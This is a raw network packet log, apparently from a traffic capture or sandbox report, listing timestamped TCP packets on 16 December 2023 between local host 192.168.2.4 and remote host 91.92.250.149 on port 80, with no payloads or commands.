                                                                                        Dec 16, 2023 18:16:57.703310966 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703325033 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703346968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703361034 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703406096 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703419924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703438044 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703450918 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.926832914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.926918983 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927117109 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927167892 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927375078 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927418947 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927561045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927604914 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927628040 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927666903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927722931 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927766085 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927807093 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927846909 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927926064 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.927972078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.927998066 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928036928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928122044 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928164959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928200960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928239107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928266048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928302050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928378105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928421021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928442955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928482056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928596973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928641081 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928697109 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928741932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928802967 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928843975 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928909063 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.928950071 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.928982973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929024935 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929137945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929150105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929179907 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929193020 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929203033 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929239988 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929277897 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929321051 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929382086 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929424047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929476976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929517984 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929549932 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929588079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929647923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929686069 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929718018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929757118 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929769993 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929811001 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929835081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929872990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929904938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.929943085 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.929975986 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930020094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930109024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930147886 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930219889 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930263042 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930291891 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930330038 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930489063 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930529118 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930547953 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930586100 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930619001 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930660963 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930736065 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930775881 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930798054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930835009 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930871010 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.930912971 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.930974960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931019068 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931032896 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931066036 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931126118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931164980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931215048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931258917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931291103 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931328058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931379080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931416035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931427956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931463957 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931497097 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931538105 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931541920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931577921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931736946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931788921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931811094 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931849003 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.931919098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.931958914 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932004929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932043076 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932076931 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932118893 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932137012 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932179928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932272911 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932317019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932351112 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932389021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932411909 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932449102 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932531118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932578087 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932600975 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932637930 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932706118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932748079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932780981 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932818890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932851076 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.932897091 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.932961941 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933002949 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933027983 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933068037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933089972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933124065 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933142900 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933185101 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933207989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933244944 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933320045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933363914 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933419943 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933468103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933500051 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933536053 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933585882 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933629990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933664083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933700085 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933722973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933760881 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933784962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933821917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933855057 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933893919 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.933911085 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.933944941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934001923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934045076 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934067011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934098959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934258938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934302092 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934324026 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934360981 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934382915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934418917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934452057 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934493065 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934557915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934606075 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934638023 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934676886 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934729099 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934773922 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934798002 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934839964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934865952 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934902906 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934926987 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.934962988 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.934972048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935003996 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935038090 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935080051 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935086966 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935122967 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935146093 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935178995 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935228109 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935267925 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935298920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935332060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935370922 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935401917 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935412884 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935435057 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935473919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935511112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935532093 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935566902 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935597897 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935641050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935651064 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935683966 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935698032 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935734987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935786009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935827017 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935848951 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935884953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935914993 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.935950041 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.935996056 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936036110 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936050892 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936084032 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936105967 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936141014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936192989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936232090 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936259031 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936294079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936326027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936367035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936422110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936459064 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936471939 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936507940 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936522961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936559916 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936619997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936661959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936664104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936702013 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936767101 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936806917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936846018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936886072 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.936918020 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.936954021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937016010 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937057018 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937283039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937294006 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937304974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937314987 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937324047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937340975 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937362909 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937371016 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937407970 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937490940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937526941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937603951 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937648058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937665939 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937700987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937725067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937757015 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937774897 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937810898 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937880039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.937922001 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.937971115 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938007116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938029051 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938067913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938365936 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938410997 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938445091 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938488007 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938496113 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938532114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938551903 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938594103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938608885 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938637972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938646078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938673019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938684940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938720942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938731909 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938766956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938796043 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938838005 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938846111 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938882113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.938908100 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938972950 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.938986063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939009905 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939013958 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939044952 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939078093 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939117908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939152956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939196110 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939218044 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939256907 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939266920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939301014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939332008 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939371109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939383984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939423084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939487934 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939528942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939538002 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939573050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939632893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939676046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939697027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939735889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939769030 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939810991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939819098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939856052 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939867973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939908981 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.939914942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.939953089 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940001011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940043926 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940109968 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940151930 CET4972980192.168.2.491.92.250.149
